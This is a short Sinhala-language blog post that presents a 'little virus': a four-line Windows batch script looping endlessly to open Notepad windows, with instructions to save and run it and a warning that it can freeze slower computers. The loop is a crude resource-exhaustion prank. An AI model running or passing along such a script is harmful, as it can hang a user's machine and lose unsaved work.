Powered by Blogger.

පුංචි Virus එකක් හදමුද?

1. හොඳ speed computer එකක් නෙමෙයි නම් මේක කරන්න එපා.මේකෙන් වෙන්නේ එකවර notepad window 100ක් විතර open වෙනවා.මෙමගින් ඔයාලගේ processor එක down ගහන්න පුළුවන්.stuck වෙන්නත් පුළුවන්.එහෙම වෙනවා වගේ දැනුනොත් ඉක්මනටම restart කරන්න. අපි වැඩේ පටන් ගමු.

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


මෙ ටික Notpad 1කෙ දා ගෙන .bat file 1කක් විදිහට කර save කර ගන්න,ඊට පස්සෙ Run කරලම බලන්න....
:D



Share on Google Plus

About Unknown

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
    Blogger Comment
    Facebook Comment

1 comments: